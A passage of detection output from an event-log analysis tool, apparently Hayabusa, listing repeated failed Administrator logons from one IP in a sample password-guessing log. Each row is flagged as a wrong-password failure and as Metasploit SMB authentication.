SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: 
